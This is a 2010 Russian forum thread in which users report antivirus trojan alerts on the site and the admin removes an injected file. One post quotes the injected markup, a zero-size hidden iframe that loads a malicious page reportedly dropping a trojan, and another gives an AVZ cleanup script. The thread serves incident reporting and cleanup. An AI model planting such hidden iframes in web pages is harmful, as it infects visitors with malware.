Jump to content
Shigin

Вирус на форуме

Recommended Posts

Админы Всем привет!!!! Извините я не знаю куда направить эту тему. Переместите её куда нужно.

Почему когда переходишь по какой нибудь ссылке на вашем сайте то Касперский говорит следующее: см.рисунок

post-113220-1263506891_thumb.jpg

Share this post


Link to post
Share on other sites

Спасибо.

Проблема уже решается и будет решена в кротчайшие сроки.

Share this post


Link to post
Share on other sites

Технология Maxim Integrated nanoPower: когда малый IQ имеет преимущества

При разработке устройств с батарейным питанием важно выбирать компоненты не просто с малым потреблением, но и с предельно малым током покоя. При этом следует обратить внимание на линейку nanoPower производства компании Maxim Integrated. В статье рассмотрено их применение на примере системы датчиков беспроводной оконной сигнализации.

Подробнее

                     

Материалы вебинара STM32G0 – новый лидер бюджетных 32-битных микроконтроллеров от STMicroelectronics

На вебинаре были продемонстрированы современные методы тестирования производительности микроконтроллеров на примере самых бюджетных 32-битных семейств общего назначения STM32G0 и STM32F0, проведено их подробное сравнение. Мы подготовили для вас материалы. Вы можете посмотреть видеозапись вебинара, ознакомиться с ответами на вопросы, загрузить код для тестирования, прочитать статьи по теме

Подробнее...

У меня то же самое при загрузке Форума и скорость упала.

Edited by xan

Share this post


Link to post
Share on other sites

По каким именно ссылкам? Несовсем понятно. Опишите подробнее что делаете. И как давно такое стало появляться.

У меня Kaspersky Internet Security 2010. Ничего подобного не наблюдаю.

P.S. Все нашел файлик. Проблема исправлена.

P.S.S. Спасибо, что сразу же сообщили.

Share this post


Link to post
Share on other sites
У меня на троян ругается Касперский .базы новейшие
у меня тоже самое,стоит каспер 2010. когда читаеш еще нормально ну вот когда начинаеш отвичать на какой нибудь вопрос то тогда аж компьютер виснит,восновном в разделе ПИТАНИЕ

Share this post


Link to post
Share on other sites

При заходе на сайт мой Каспер ругается - троян.. и это при переходе на любую страницу сайта такое происходит.

вот что пишет:

15.01.2010

10:11:28

Обнаружено: HEUR:Trojan.Script.Iframer

http://forum.cxem.net/jscripts/ips_ipsclass.js//ips_ipsclass

Opera Internet Browser

Каспер (KIS) у меня 2010.

Share this post


Link to post
Share on other sites

Народ, не нужно здесь каждому писАть то, что у него тоже самое.

Пробема известна и будем её решать. Ждите.

Share this post


Link to post
Share on other sites

Если отключить выполнение скриптов ? Опера , AVAST- тишина.. Похоже у меня Ad Muncher эту активность гасит.

Edited by fant

Share this post


Link to post
Share on other sites

Во блин, я то захожу на форум - AVAST сразу сообщение.

Руткит Win32:Hod prot

Троян JS:Downloader-IF

Share this post


Link to post
Share on other sites

Почистил журнал Ad Muncher, перезашёл на сайт.. Блокируется шесть объектов. 5 картинок и скрипт.. При открытии темы опять то же самое..

Share this post


Link to post
Share on other sites

Всплыл какой-то alert в опере, на ангийском, что-то было про скрипт, потом когда убрал его выскочило вот это.

Какое-то подозрительное обновление.

605211e15224.jpg

В логах Outpost-a нашел что-то заблокированное. Java в опере включена.

Вспомнил что в 3 часа ночи тоже самое было, на скрине видно.

42ee6f0bf0d8.jpg

скрипт видимо отсюда шел

rasvps.com/css/sv777/index.php

В остальном все тихо.

На этой странице, в коде нашел то-же самое, зачем оно мне непонятно.

Среди прочих скриптов фрейм с нулевыми размерами, невидимка :)

<script type="text/javascript" src="jscripts/ips_ipsclass.js" ></SCRIPT>

<IFRAME src="http://rasvps.com/css/sv777/index.php" width="0" height="0" ></IFRAME>

<script type="text/javascript" src="jscripts/ipb_global.js" ></SCRIPT>

<script type="text/javascript" src="jscripts/ips_menu.js" ></SCRIPT>

<script type="text/javascript" src="style_images/1/folder_js_skin/ips_menu_html.js" ></SCRIPT>

<script type="text/javascript" src="cache/lang_cache/ru/lang_javascript.js" ></SCRIPT>

Share this post


Link to post
Share on other sites

rasvps.com/css/sv777/index.php - если отключить защиту оттуда загружается файлик, около 2 Кб. CureIt определяет как Trojan.WinSpy.440, но при попытке удаления вешает намертво систему с ошибкой снятия дампа памяти. Поражает sfcfiles.dll.

Удаляется выполнением в AVZ скрипта:

begin

SearchRootkit(true, true);

SetAVZGuardStatus(True);

QuarantineFile('C:\WINDOWS\system32\drivers\sfc.sys','');

QuarantineFile('C:\WINDOWS\System32\sfcfiles.dll','');

RenameFile('C:\WINDOWS\System32\sfcfiles.dll', 'C:\WINDOWS\System32\sfcfiles.bak');

CopyFile('C:\WINDOWS\System32\dllcache\sfcfiles.dll','C:\WINDOWS\System32\sfcfiles.dll');

DeleteFile('C:\WINDOWS\system32\drivers\sfc.sys');

BC_ImportALL;

ExecuteSysClean;

BC_DeleteFile('C:\WINDOWS\System32\sfcfiles.bak');

BC_Activate;

RebootWindows(true);

end.

Share this post


Link to post
Share on other sites
Среди прочих скриптов фрейм с нулевыми размерами, невидимка

А на какой это страничке?

Share this post


Link to post
Share on other sites

Хорошо что я всегда визуал базис скрипты обхожу стороной.

Outpost меня неплохо спасает оказывается :)

Share this post


Link to post
Share on other sites

А у меня KIS 2010 как молчал, так и продолжает молчать упорно. Причем я лицензионный для дома покупал, и базы каждый день обновляю. Видимо надо нормальный антивирус ставить, а не это гавно за 1500 руб.

Share this post


Link to post
Share on other sites
А на какой это страничке?

Прямо на этой в исходном коде смотрел, отвечая в форме быстрого ответа.

На 15 строке кода.

Но теперь нету, исчезло

Вот скрин сделал, того что было

efcb90e1f9a2t.jpg

Edited by welder

Share this post


Link to post
Share on other sites

admin, у тебя KIS 2010 и у меня точно такой же.. тоже покупал.. и обновляюсь каждый день.. и у других тоже

У тебя молчал.. у меня орал. и у других тоже (см. предыдущие сообщения)

Вывод: KIS 2010 - это НЕ гавно , это очень приличный антивирь. наверно его нужно просто отрегулировать.. :D

..оперативно справились с проблемой. Молодцы. спасибо.

Share this post


Link to post
Share on other sites

У меня все настройки КИС по умолчанию стоят. Я их еще раз перепроверил. Все вроде нормально. Почему он не реагировал я не знаю, это уже не в первый раз такое, в тот раз также он не обнаруживал ничего. Я в нем разочаровался.

Проблема решена частично. Не факт, что снова не появятся, надо выяснить как они доступ получают к серваку. Я уже все пароли менял по 2 раза.

Share this post


Link to post
Share on other sites

У меня стоит бесплатный Аваст и нет никакой нервотрёпки. Ничего не видит, никого не ловит. Хожу себе спокойно по сайту. Ни тебе квадратиков с треугольниками, ни вирусов.

Share this post


Link to post
Share on other sites

×
×
  • Create New...